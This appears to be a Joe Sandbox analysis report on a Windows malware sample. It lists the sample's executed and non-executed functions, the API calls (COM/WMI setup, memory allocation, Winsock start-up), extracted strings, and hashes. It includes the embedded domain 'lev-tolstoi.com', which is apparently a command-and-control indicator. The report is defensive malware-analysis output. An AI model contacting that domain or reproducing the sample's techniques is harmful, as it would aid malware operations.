Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	27.2%
Signature Coverage:	51.8%
Total number of Nodes:	114
Total number of Limit Nodes:	7

Executed Functions

Function 00437BC0 Relevance: 35.6, APIs: 11, Strings: 9, Instructions: 639
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437DE2
SysAllocString.OLEAUT32(?), ref: 00437E47
CoSetProxyBlanket.COMBASE(680742DE,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437E90
SysAllocString.OLEAUT32(?), ref: 00437EE8
SysAllocString.OLEAUT32(F9BDF745), ref: 00437FC0
VariantInit.OLEAUT32(?), ref: 00438032
VariantClear.OLEAUT32(?), ref: 004381B8
SysFreeString.OLEAUT32(?), ref: 004381DC
SysFreeString.OLEAUT32(?), ref: 004381E2

Strings

Z>\, xrefs: 0043803C
0R/T, xrefs: 0043804C
Gx, xrefs: 00437E1B
/^&P, xrefs: 00438044
/^&PZ>\, xrefs: 00437FDA
pyz{, xrefs: 00437C29
ab, xrefs: 0043806C
C, xrefs: 00437D42
Ljkl, xrefs: 00437CAC

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: String$Alloc$FreeVariant$BlanketClearCreateInitInstanceProxy
String ID: Z>\$/^&P$/^&PZ>\$0R/T$C$Gx$Ljkl$ab$pyz{
API String ID: 3490847348-109390196
Opcode ID: b231c181ff8d6da98a5bc272ab21cfc30071d9d7bfb85af6a5a038700ba4b8a6
Instruction ID: 8131ac09c1f2c8c7a662361a942698708379fad2ab2868bed6bea96b7e7f230e
Opcode Fuzzy Hash: b231c181ff8d6da98a5bc272ab21cfc30071d9d7bfb85af6a5a038700ba4b8a6
Instruction Fuzzy Hash: 2312DEB2A083519BD720CF68C88475BFBE1EBC9714F194A2DF9D497390D778D8058B86

Function 0040AD40 Relevance: 12.9, Strings: 10, Instructions: 410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/pQr, xrefs: 0040AE24
.|#~, xrefs: 0040AE1D
&x&z, xrefs: 0040AE16
l0f2, xrefs: 0040AFFB
ws, xrefs: 0040AF83
<|8~, xrefs: 0040B1A6
d<h>, xrefs: 0040AFF1
m4f6, xrefs: 0040B005
|x, xrefs: 0040AF8D
a()*, xrefs: 0040B00F

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: &x&z$.|#~$/pQr$<|8~$a()*$d<h>$l0f2$m4f6$ws$|x
API String ID: 0-1443210402
Opcode ID: bef42f24a5999112fcff0273500699b06b7358e8a10142eb4ee24f81603f5a99
Instruction ID: 5a455e5b33dc051389bcb969b85f11440245edd1c99918e46ba8560acc0916f5
Opcode Fuzzy Hash: bef42f24a5999112fcff0273500699b06b7358e8a10142eb4ee24f81603f5a99
Instruction Fuzzy Hash: E9F176B5600B02DFD3348F25D895797BBE1FB46315F118A2CD5AA8BBA0C775A805CF88

Function 004085D0 Relevance: 7.7, APIs: 5, Instructions: 170
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004085F4
GetCurrentThreadId.KERNEL32 ref: 004085FE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408713
GetForegroundWindow.USER32 ref: 00408728

Part of subcall function 0040C5C0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5D3

Part of subcall function 0040B3C0: FreeLibrary.KERNEL32(004087DE), ref: 0040B3C6
Part of subcall function 0040B3C0: FreeLibrary.KERNEL32 ref: 0040B3E7

ExitProcess.KERNEL32 ref: 004087E5

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
Instruction ID: e578a3b207df15b92ed52ca48c6c45aa0500652032070dd10f4452ae5aeaaed9
Opcode Fuzzy Hash: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
Instruction Fuzzy Hash: 39512877F547184BC318AEB98D8636AF6C65BC4210F0E813EA985E73D1EDB89C4542C8

Function 0040A8C0 Relevance: 6.6, Strings: 5, Instructions: 384
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@G, xrefs: 0040A9BA
$>, xrefs: 0040ACBB, 0040AB14, 0040ACED, 0040ACB2
xA, xrefs: 0040A9C2
/ , xrefs: 0040AA40
$>, xrefs: 0040AB44

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: $>$$>$/ $@G$xA
API String ID: 0-3945432221
Opcode ID: 1f9dd7b07d0464a3871681ac543f7f30e7f289b115bd5a1a199045cae91454cc
Instruction ID: 55ac8b7e195ada22395993ae97bb18e0f83c644d7aeb54a7be5ab8cf0bb5c33f
Opcode Fuzzy Hash: 1f9dd7b07d0464a3871681ac543f7f30e7f289b115bd5a1a199045cae91454cc
Instruction Fuzzy Hash: AFB1167520C3508BD324CF1884906AFBBE2EFC2704F18497DE9D12B381D679995AD78B

Function 0040C63C Relevance: 4.4, Strings: 3, Instructions: 602
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^_, xrefs: 0040CDF5
C7E99BE82D116EAC25E054D164A37606, xrefs: 0040C6BF, 0040CAEF
lev-tolstoi.com, xrefs: 0040CA49, 0040CE7B

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: C7E99BE82D116EAC25E054D164A37606$^_$lev-tolstoi.com
API String ID: 0-3689886585
Opcode ID: 1756b59fe5bbb69c448a25ce81c9b929e652f332c93af6c72070d1cd974e5a62
Instruction ID: dd9baf14083705404bbb6167aa7354d43b480db8533e0b19abc2341ccbf856c6
Opcode Fuzzy Hash: 1756b59fe5bbb69c448a25ce81c9b929e652f332c93af6c72070d1cd974e5a62
Instruction Fuzzy Hash: C1020DB158E3928AD334CF2594907EBBBE1EBD6304F088A6DC4D91B342D7390909DBD6

Function 004707A6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004707CE
Module32First.KERNEL32(00000000,00000224), ref: 004707EE

Memory Dump Source

Source File: 00000000.00000002.2043604722.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 5595ceff43f7b3773f2b5f76221f31d5ab95906f67ec572e80d6a2261ca759b8
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: B6F0C231102310ABD7203AB5988CAAFB7ECAF49725F10852AE64A911C0DA78F8054A64

Function 0043C330 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043E40B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C35E

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043E840 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 751462d93d042a55990990ac1d4287ed324398e9759de5a96dbc9d6a6aa29821
Instruction ID: 4d7dcfee1db6f6d48993414e542c2c95e5bcdc0dd52ea84200f971aeb3cabb85
Opcode Fuzzy Hash: 751462d93d042a55990990ac1d4287ed324398e9759de5a96dbc9d6a6aa29821
Instruction Fuzzy Hash: A04137766153005FE314EB26DC80B67B3A6FFC9314F1A982DE584973A0E635EC11978A

Function 0043CA12 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b581ea95b5affbbd2d441ab3bf991b3166ab57e396bc3bff6f6687d26169d528
Instruction ID: 9bab5eeda3f2c328a6bc7135d099a7f1260cbe33dc8c8fee6861cc27dc7a273f
Opcode Fuzzy Hash: b581ea95b5affbbd2d441ab3bf991b3166ab57e396bc3bff6f6687d26169d528
Instruction Fuzzy Hash: 1C21E935B441198BDB04DB14C8C1ABFB332BB9E714F28B129C85237352D3399D129B98

Function 0062003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0062024D

Strings

kernel32.dll, xrefs: 0062008F, 00620095
cess, xrefs: 0062018D

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 42ec4702e70d4e90e99a8a4f860a1c510c2e99c0fd791167ea9c40f41969c617
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: FB526874A01229DFDB64CF58D985BA8BBB1BF09304F1480D9E94DAB352DB30AE85DF14

Function 0043C5AF Relevance: 3.0, APIs: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043C5AF
GetForegroundWindow.USER32 ref: 0043C5C0

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 79680ac2d5f547ec917eb5f99452d1fa5a9d20136bed208c7213e3ef94e53174
Instruction ID: 333b4a9834557b4172d2651f462c7a903e8ce65bf7bd4680bd615953da4b5774
Opcode Fuzzy Hash: 79680ac2d5f547ec917eb5f99452d1fa5a9d20136bed208c7213e3ef94e53174
Instruction Fuzzy Hash: 80D05EE995150047CA04BB71AC858273229F64B34A7186878E00301262EA25A0428B5B

Function 00620E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00620223,?,?), ref: 00620E19
SetErrorMode.KERNELBASE(00000000,?,?,00620223,?,?), ref: 00620E1E

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ca7d39d3f00bb23aeb65542139c9111eb9232972a72a4ee517b453a7e7f206fa
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: FCD0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9581C770994046E5

Function 0043C2D0 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B308,00000000,00000001), ref: 0043C302

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 98cbbb343254cd52c79eb1ca115f38d3187f6c377695bce7c7a2cd07440916c9
Instruction ID: 8a0177ad85e7c08c69245f52b8f4417eb00afcd063061f7275faf4d6d67a0887
Opcode Fuzzy Hash: 98cbbb343254cd52c79eb1ca115f38d3187f6c377695bce7c7a2cd07440916c9
Instruction Fuzzy Hash: AAE02B76418221ABC6002B25BC09B5B3A68DF8E721F030C36F40072121D739E81286EF

Function 0040C5C0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5D3

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 850955786ed28da5065a80bade014127d727ab8898c815214f1986fcd95a4124
Instruction ID: ce014e1d32f27ec12ad37ecc0dfb2a09a1fae06e6abce3ab2790199683b38062
Opcode Fuzzy Hash: 850955786ed28da5065a80bade014127d727ab8898c815214f1986fcd95a4124
Instruction Fuzzy Hash: CFD02E2969000027D208AB2CAC07F23329D9B03B52F000239E1A3969E2ED406900826A

Function 00409D3E Relevance: 1.5, APIs: 1, Instructions: 17networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 00409D57

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: c762492f77ef8383059f4507e25c1adb5b493a45ba99c1c68facf99e2ce72a69
Instruction ID: 053523fb6dd4afe8cef3d8c09916653202b249c7e86413b2563bb4d9ce308e2c
Opcode Fuzzy Hash: c762492f77ef8383059f4507e25c1adb5b493a45ba99c1c68facf99e2ce72a69
Instruction Fuzzy Hash: D9D0A779745501B7DB0CAF24FC6AA2A3694DB4BB46F04003DB403D22E2DD218A609518

Function 0040C5F5 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C607

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 131c3e875a066bb12a276a62a713607dd4adbce56e7278532486b94642aead36
Instruction ID: 64d0c7dc1a51f575c656917cfcf27d06668b7b4f648f1d88eb1df91404deb98c
Opcode Fuzzy Hash: 131c3e875a066bb12a276a62a713607dd4adbce56e7278532486b94642aead36
Instruction Fuzzy Hash: C7D0C9743C834176F5348B08EC13F5132555302F12F340624F362FE2E4CAD0B201860C

Function 0043A940 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043C31B,?,0040B308,00000000,00000001), ref: 0043A960

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 910c0af3420ea00ce46c07591240b3ae9376ee87c5be7e09da62257baa930bc0
Instruction ID: c567b57adf38a1f54fef76dd5790cc9636adae08f6cfb23484a9f5fe40784e0e
Opcode Fuzzy Hash: 910c0af3420ea00ce46c07591240b3ae9376ee87c5be7e09da62257baa930bc0
Instruction Fuzzy Hash: 42D01272419632FBC6102F18BC15BCB3B55EF4A321F0748A2F5446A175D774DC91CAD8

Function 0043A92B Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A931

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8b84c401ed621f98c69bb3f8c5d8cc5e5be64f5d27f130d331e977eda1e0ff18
Instruction ID: 2264aa9d2aabd2ef6d2248d85dbb31dab42ea94ade32cd6cf29d8f8327bb6f23
Opcode Fuzzy Hash: 8b84c401ed621f98c69bb3f8c5d8cc5e5be64f5d27f130d331e977eda1e0ff18
Instruction Fuzzy Hash: 18A012300401109AC5141B00BD09FC53E10DB11211F010051B000040B182508841C5C4

Function 00470465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004704B6

Memory Dump Source

Source File: 00000000.00000002.2043604722.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: a0bfb27cbe6de90053606688358b4ba16acdfac2ce2fc8a29e6b2121caff52c3
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 6F113F79A40208EFDB01DF98C985E99BBF5AF08350F05C095F9489B362D375EA50DF84

Function 0040D0F8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 0040D104

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: 2f66f3a0d5cf90002a3e6a9fa3fcee9ac7d9c218353d55ba06cc219d7cd29388
Instruction ID: d9540b01f5847f02dc4681d7ac8599416201f8ff36d73ea169f27b9f71756f01
Opcode Fuzzy Hash: 2f66f3a0d5cf90002a3e6a9fa3fcee9ac7d9c218353d55ba06cc219d7cd29388
Instruction Fuzzy Hash: 46D022BCD0C106CBE208DF21EC40436B2B2AFCF30AF14583AD003232B2E636A4118A0E

Non-executed Functions

Function 00631EA7 Relevance: 133.2, Strings: 105, Instructions: 1974COMMON

Download Yara Rule

Strings

}, xrefs: 00633667
Y, xrefs: 00632B27
h, xrefs: 00632025
', xrefs: 0063279B
:, xrefs: 00632E9B
S, xrefs: 00633077
&, xrefs: 0063376F
^, xrefs: 00633067
o, xrefs: 00631F85
", xrefs: 0063374F
W, xrefs: 00633364
z, xrefs: 00633627
6, xrefs: 00632C05
2, xrefs: 00631F10
K, xrefs: 00633304
*, xrefs: 0063267C
., xrefs: 0063269C
], xrefs: 00633394
I, xrefs: 006332F4
O, xrefs: 00633324
[, xrefs: 00633384
>, xrefs: 00632B2F
G, xrefs: 006332E4
p, xrefs: 006336E7
D, xrefs: 00633CE9
X, xrefs: 0063212B
", xrefs: 006336B7
8, xrefs: 006330CF
t, xrefs: 006336F7
K, xrefs: 00633087
,, xrefs: 0063306F
8, xrefs: 0063336C
*, xrefs: 0063370F
, xrefs: 0063308F
$, xrefs: 006330AF
!, xrefs: 006326B4
@, xrefs: 00633747
$, xrefs: 0063375F
", xrefs: 006326BC
7, xrefs: 0063337C
$, xrefs: 00633A58
b, xrefs: 00633677
=, xrefs: 006336A7
2, xrefs: 00632B4F
:, xrefs: 006330DF
,, xrefs: 0063371F
8, xrefs: 0063377F
l, xrefs: 006320B1
t, xrefs: 00633617
4, xrefs: 00632A2B
D, xrefs: 00633838
_, xrefs: 006330A7
], xrefs: 00633097
&, xrefs: 006330BF
s, xrefs: 00633647
., xrefs: 0063249B
p, xrefs: 00633657
[, xrefs: 00633057
U, xrefs: 00633354
o, xrefs: 006324A0
0, xrefs: 00632B3F
_, xrefs: 006333A4
&, xrefs: 00632796
`, xrefs: 00632CD9
", xrefs: 0063309F
9, xrefs: 006330D7
j, xrefs: 00633637
, xrefs: 0063327E
, xrefs: 006326AC
., xrefs: 0063372F
9, xrefs: 00633787
(, xrefs: 0063266C
Q, xrefs: 00633334
D, xrefs: 00633CF6
E, xrefs: 006332D4
5, xrefs: 00633A40
t, xrefs: 006336C7
,, xrefs: 0063268C
V, xrefs: 00633767
x, xrefs: 00632816
M, xrefs: 00633314
e, xrefs: 00633687
6, xrefs: 0063265C
., xrefs: 0063307F
4, xrefs: 00632341
Y, xrefs: 00633374
S, xrefs: 00633344
(, xrefs: 006336FF
:, xrefs: 0063378F
*, xrefs: 0063305F
<, xrefs: 00632B1F
x, xrefs: 006327A0
e, xrefs: 00632B17
P, xrefs: 00633757
3, xrefs: 00632B57
|, xrefs: 00633A48
4, xrefs: 00632B5F
I, xrefs: 00633717
, xrefs: 0063373F
_, xrefs: 00633737
4, xrefs: 0063264C
-, xrefs: 00632496
y, xrefs: 00633607
g, xrefs: 00633697
0, xrefs: 00632A4B

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: $ $ $ $!$"$"$"$"$$$$$$$&$&$&$'$($($*$*$*$,$,$,$-$.$.$.$.$0$0$2$2$3$4$4$4$4$5$6$6$7$8$8$8$9$9$:$:$:$<$=$>$@$D$D$D$E$G$I$I$K$K$M$O$P$Q$S$S$U$V$W$X$Y$Y$[$[$]$]$^$_$_$_$`$b$e$e$g$h$j$l$o$o$p$p$s$t$t$t$x$x$y$z$|$}
API String ID: 0-2173774466
Opcode ID: 613c8e147c67d88f1679a4c1d382fc397d039c2bac889df07ef81e194eacbfd5
Instruction ID: 294d906960934bfdf79c9cfbae6edc5779e518e5d69397fd9f7dc322308ce2dd
Opcode Fuzzy Hash: 613c8e147c67d88f1679a4c1d382fc397d039c2bac889df07ef81e194eacbfd5
Instruction Fuzzy Hash: 6313CB3160C7D18AD335CB38C4543AFBBE2ABD6314F188A6DE4D987392D6788945CB93

Function 00411C40 Relevance: 133.2, Strings: 105, Instructions: 1974COMMON

Download Yara Rule

Strings

], xrefs: 0041312D
j, xrefs: 004133D0
p, xrefs: 004133F0
5, xrefs: 004137D9
,, xrefs: 004134B8
*, xrefs: 00412415
, xrefs: 004134D8
, xrefs: 00413017
X, xrefs: 00411EC4
I, xrefs: 004134B0
", xrefs: 004134E8
o, xrefs: 00411D1E
8, xrefs: 00413518
6, xrefs: 004123F5
, xrefs: 00412E28
", xrefs: 00413450
$, xrefs: 004134F8
<, xrefs: 004128B8
M, xrefs: 004130AD
&, xrefs: 00412E58
p, xrefs: 00413480
K, xrefs: 00412E20
t, xrefs: 00413490
e, xrefs: 004128B0
4, xrefs: 004123E5
Y, xrefs: 004128C0
!, xrefs: 0041244D
_, xrefs: 00412E40
", xrefs: 00412455
D, xrefs: 004135D1
t, xrefs: 00413460
4, xrefs: 004128F8
:, xrefs: 00412C34
W, xrefs: 004130FD
x, xrefs: 004125AF
", xrefs: 00412E38
}, xrefs: 00413400
b, xrefs: 00413410
., xrefs: 00412435
O, xrefs: 004130BD
., xrefs: 00412E18
3, xrefs: 004128F0
., xrefs: 00412234
@, xrefs: 004134E0
,, xrefs: 00412E08
o, xrefs: 00412239
S, xrefs: 004130DD
8, xrefs: 00412E68
^, xrefs: 00412E00
V, xrefs: 00413500
z, xrefs: 004133C0
[, xrefs: 00412DF0
l, xrefs: 00411E4A
_, xrefs: 004134D0
9, xrefs: 00413520
], xrefs: 00412E30
*, xrefs: 00412DF8
g, xrefs: 00413430
, xrefs: 00412445
y, xrefs: 004133A0
U, xrefs: 004130ED
t, xrefs: 004133B0
7, xrefs: 00413115
:, xrefs: 00412E78
', xrefs: 00412534
-, xrefs: 0041222F
2, xrefs: 004128E8
., xrefs: 004134C8
_, xrefs: 0041313D
>, xrefs: 004128C8
D, xrefs: 00413A82
,, xrefs: 00412425
0, xrefs: 004127E4
6, xrefs: 0041299E
P, xrefs: 004134F0
9, xrefs: 00412E70
2, xrefs: 00411CA9
8, xrefs: 00413105
K, xrefs: 0041309D
I, xrefs: 0041308D
G, xrefs: 0041307D
:, xrefs: 00413528
(, xrefs: 00413498
D, xrefs: 00413A8F
0, xrefs: 004128D8
x, xrefs: 00412539
&, xrefs: 00413508
Y, xrefs: 0041310D
4, xrefs: 004120DA
4, xrefs: 004127C4
[, xrefs: 0041311D
&, xrefs: 0041252F
E, xrefs: 0041306D
s, xrefs: 004133E0
S, xrefs: 00412E10
$, xrefs: 00412E48
`, xrefs: 00412A72
h, xrefs: 00411DBE
